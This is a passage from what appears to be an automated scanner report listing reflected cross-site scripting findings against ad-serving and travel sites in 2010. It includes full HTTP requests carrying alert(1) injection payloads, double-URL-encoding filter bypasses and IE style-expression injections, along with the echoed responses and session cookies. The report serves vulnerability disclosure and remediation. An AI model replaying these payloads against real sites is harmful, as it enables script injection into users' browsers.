Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 176301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xh
...[SNIP]...
<Meta Name="DCSext.ndtab" CONTENT="PRObeb2f"style="x:expression(alert(1))"1aa717214d2"/>
...[SNIP]...

2.32. http://vulnerable.verizon.host/clk [gcid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /clk

Issue detail

The value of the gcid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c66e"style%3d"x%3aexpression(alert(1))"9cd31f2b2bc was submitted in the gcid parameter. This input was echoed as 8c66e"style="x:expression(alert(1))"9cd31f2b2bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /clk;210955717;24466695;s?http://www.orbitz.com/App/GDDC?deal_id=air-cheap-flight-deals&gcid=C11287x6388c66e"style%3d"x%3aexpression(alert(1))"9cd31f2b2bc&WT.mc_id=bn30&WT.mc_ev=click HTTP/1.1
Host: vulnerable.verizon.host
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=815C45600BA07FC8F91BF98A73CC851B; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: anon=10302318551290224142818; Domain=.orbitz.com; Expires=Fri, 15-Nov-2030 03:35:42 GMT; Path=/
Set-Cookie: OrbitzRegistration="N,0,0,0"; Domain=.orbitz.com; Expires=Fri, 15-Nov-2030 03:35:42 GMT; Path=/
Set-Cookie: BetaGroup="11/19/2010 21:35:42|A|A|N|C|N|H|B|P|N"; Domain=.orbitz.com; Expires=Sat, 04-Dec-2010 03:35:42 GMT; Path=/
Set-Cookie: logging=815C45600BA07FC8F91BF98A73CC851B|egapp48p|; Domain=.orbitz.com; Path=/
Set-Cookie: MKTG="SEM|C11287x6388c66e\"style=\"x:expression(alert(1))\"9cd31f2b2bc| |1290224142821|bn30| |11/19/2010 21:35:42 PM| | |1"; Domain=.orbitz.com; Expires=Mon, 20-Dec-2010 03:35:42 GMT; Path=/
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Content-Type: text/html
Date: Sat, 20 Nov 2010 03:35:42 GMT
Set-Cookie: NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3272145525d5f4f58455e445a4a4217b9;path=/
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 33858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&spu=C11287x6388c66e"style="x:expression(alert(1))"9cd31f2b2bc&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1290224142838&">
...[SNIP]...

2.33. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5cead%2522%253balert%25281%2529%252f%252f70bc5b86024 was submitted in the REST URL parameter 2. This input was echoed as 5cead";alert(1)//70bc5b86024 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313575cead%2522%253balert%25281%2529%252f%252f70bc5b86024/1354.0.iframe.200x33/0.2084487870534576 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1884

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a6313575cead";alert(1)//70bc5b86024/1354.0.iframe.200x33/1290209587**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.34. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99764%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee90710d87cb was submitted in the REST URL parameter 2. This input was echoed as 99764"><script>alert(1)</script>e90710d87cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135799764%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee90710d87cb/1354.0.iframe.200x33/0.2084487870534576 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1929

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a63135799764"><script>alert(1)</script>e90710d87cb/1354.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.35. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94844%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb32014b325 was submitted in the REST URL parameter 3. This input was echoed as 94844"><script>alert(1)</script>b32014b325 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x3394844%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb32014b325/0.2084487870534576 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x3394844"><script>alert(1)</script>b32014b325/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.36. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cc53%2522%253balert%25281%2529%252f%252f862f59f63eb was submitted in the REST URL parameter 3. This input was echoed as 6cc53";alert(1)//862f59f63eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x336cc53%2522%253balert%25281%2529%252f%252f862f59f63eb/0.2084487870534576 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1884

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x336cc53";alert(1)//862f59f63eb/1290209590**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.37. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ff13"-alert(1)-"56d7644f92 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576?click=http://global.ard.yahoo.com/SIG=15ljnna42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*4ff13"-alert(1)-"56d7644f92 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://my.yahoo.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: u=4cdc67692496d; i_1=46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L|19:318:494:29:0:32731:1290036045:L; fp=184372:eq:2:CS:10:3:1289925656:1:46

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2337

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
na42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*4ff13"-alert(1)-"56d7644f92">
...[SNIP]...

2.38. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd7ff"><script>alert(1)</script>dc019ab0230 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576?click=http://global.ard.yahoo.com/SIG=15ljnna42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*dd7ff"><script>alert(1)</script>dc019ab0230 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://my.yahoo.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: u=4cdc67692496d; i_1=46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L|19:318:494:29:0:32731:1290036045:L; fp=184372:eq:2:CS:10:3:1289925656:1:46

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2369

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
na42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*dd7ff"><script>alert(1)</script>dc019ab0230http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c6f8"-alert(1)-"5117fe222e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576?click=http://global.ard.yahoo.com/SIG=15ljnna42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*&8c6f8"-alert(1)-"5117fe222e0=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://my.yahoo.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: u=4cdc67692496d; i_1=46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L|19:318:494:29:0:32731:1290036045:L; fp=184372:eq:2:CS:10:3:1289925656:1:46

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2345

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
a42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*&8c6f8"-alert(1)-"5117fe222e0=1">
...[SNIP]...

2.40. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b283c"><script>alert(1)</script>008acd22d8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576?click=http://global.ard.yahoo.com/SIG=15ljnna42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*&b283c"><script>alert(1)</script>008acd22d8c=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://my.yahoo.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: u=4cdc67692496d; i_1=46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L|19:318:494:29:0:32731:1290036045:L; fp=184372:eq:2:CS:10:3:1289925656:1:46

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2375

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
a42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*&b283c"><script>alert(1)</script>008acd22d8c=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.41. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [10,1,102,64;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275**

Issue detail

The value of the 10,1,102,64;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0d08'-alert(1)-'40c23d3dbd0 was submitted in the 10,1,102,64;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275**;10,1,102,64;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F?click=http://global.ard.yahoo.com/SIG=15ljnna42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*b0d08'-alert(1)-'40c23d3dbd0 HTTP/1.1
Accept: */*
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576?click=http://global.ard.yahoo.com/SIG=15ljnna42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: u=4cdc67692496d; i_1=46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L|19:318:494:29:0:32731:1290036045:L; fp=184372:eq:2:CS:10:3:1289925656:1:46

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4cdc67692496d; expires=Sun, 19-Dec-2010 23:33:27 GMT; path=/
Set-Cookie: i_1=46:1354:802:44:0:32947:1290209607:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; expires=Sun, 19-Dec-2010 23:33:27 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 724

   function wsod_image() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15ljnna42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*b0d08'-alert(1)-'40c23d3dbd0http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.802.iframe.200x33/**;10.1102;1920;1200;http:_@2F_@2Fmy.yahoo.com_@2F" target="_blank" title="Online $7 Trades! Click to find out more!">
...[SNIP]...

2.42. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275**

Issue detail

